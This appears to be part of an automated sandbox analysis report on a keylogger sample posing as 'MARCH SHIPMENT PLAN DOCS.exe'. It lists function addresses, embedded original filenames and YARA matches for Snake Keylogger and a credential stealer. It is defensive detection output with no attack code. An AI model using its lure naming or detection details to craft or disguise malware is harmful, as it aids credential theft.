Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2F961	10_2_02F2F961
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F23E09	10_2_02F23E09
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F21FA8	10_2_06F21FA8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F29448	10_2_06F29448
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F29D38	10_2_06F29D38
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F22A90	10_2_06F22A90
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F21850	10_2_06F21850
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F25148	10_2_06F25148
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2D670	10_2_06F2D670
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2D660	10_2_06F2D660
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F29668	10_2_06F29668
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2E7D0	10_2_06F2E7D0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2E7C0	10_2_06F2E7C0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F21F9F	10_2_06F21F9F
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2DF20	10_2_06F2DF20
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2DF11	10_2_06F2DF11
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F4D8	10_2_06F2F4D8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F28CC0	10_2_06F28CC0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F4C8	10_2_06F2F4C8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F28CB1	10_2_06F28CB1
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2EC28	10_2_06F2EC28
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2EC18	10_2_06F2EC18
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2CDC0	10_2_06F2CDC0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2DAC8	10_2_06F2DAC8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2DAB9	10_2_06F2DAB9
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2D218	10_2_06F2D218
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2E378	10_2_06F2E378
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2E369	10_2_06F2E369
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F20B30	10_2_06F20B30
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F20B20	10_2_06F20B20
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F080	10_2_06F2F080
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F071	10_2_06F2F071
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F20040	10_2_06F20040
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F21841	10_2_06F21841
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F20006	10_2_06F20006
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F930	10_2_06F2F930
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2513F	10_2_06F2513F
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2F921	10_2_06F2F921
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DF5294	12_2_02DF5294
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DFBCE8	12_2_02DFBCE8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DF47D8	12_2_02DF47D8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DF47D3	12_2_02DF47D3
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DF6791	12_2_02DF6791
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DF2874	12_2_02DF2874
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02DFBCD9	12_2_02DFBCD9
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02E1B5A0	12_2_02E1B5A0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02E1E52E	12_2_02E1E52E
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02E19BA0	12_2_02E19BA0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_02E19B8F	12_2_02E19B8F
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_070586D8	12_2_070586D8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_070586E8	12_2_070586E8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_07059390	12_2_07059390
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_0705B008	12_2_0705B008
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_07058F48	12_2_07058F48
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_07058F58	12_2_07058F58
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_07058B11	12_2_07058B11
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_07058B20	12_2_07058B20
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_01227118	20_2_01227118
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122C148	20_2_0122C148
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_01225370	20_2_01225370
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122D278	20_2_0122D278
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122C468	20_2_0122C468
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122C738	20_2_0122C738
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_012269B0	20_2_012269B0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122E988	20_2_0122E988
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122CA08	20_2_0122CA08
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_01229DE0	20_2_01229DE0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122CCD8	20_2_0122CCD8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122CFAB	20_2_0122CFAB
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122F961	20_2_0122F961
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122F970	20_2_0122F970
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_0122E97B	20_2_0122E97B
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_012239EE	20_2_012239EE
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_012229EC	20_2_012229EC
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_01223AA1	20_2_01223AA1
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_01223E18	20_2_01223E18
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B1FA8	20_2_069B1FA8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B9448	20_2_069B9448
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B9D38	20_2_069B9D38
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B2A90	20_2_069B2A90
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B1850	20_2_069B1850
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B5148	20_2_069B5148
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BD670	20_2_069BD670
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B9668	20_2_069B9668
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BD660	20_2_069BD660
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B1FA2	20_2_069B1FA2
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BE7D0	20_2_069BE7D0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BE7C0	20_2_069BE7C0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BDF1F	20_2_069BDF1F
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BDF11	20_2_069BDF11
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BDF20	20_2_069BDF20
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B8CB1	20_2_069B8CB1
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BF4D8	20_2_069BF4D8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B8CC0	20_2_069B8CC0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BEC18	20_2_069BEC18
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BEC28	20_2_069BEC28
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BCDAF	20_2_069BCDAF
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BCDC0	20_2_069BCDC0
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BDAB9	20_2_069BDAB9
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BDAC8	20_2_069BDAC8
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BD218	20_2_069BD218
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BD209	20_2_069BD209
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B0B30	20_2_069B0B30
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B0B20	20_2_069B0B20
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BE378	20_2_069BE378
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BE36A	20_2_069BE36A
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BF080	20_2_069BF080
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B0007	20_2_069B0007
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B1841	20_2_069B1841
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B0040	20_2_069B0040
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BF071	20_2_069BF071
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069B5138	20_2_069B5138
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BF930	20_2_069BF930
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 20_2_069BF922	20_2_069BF922

Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000000.1235297565.00000000009F6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1284351587.000000000701E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1284899452.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002D6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1277345689.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1287956774.0000000008900000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3703377538.0000000001337000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
Source: MARCH SHIPMENT PLAN DOCS.exe	Binary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: MARCH SHIPMENT PLAN DOCS.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PKjWaa.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'

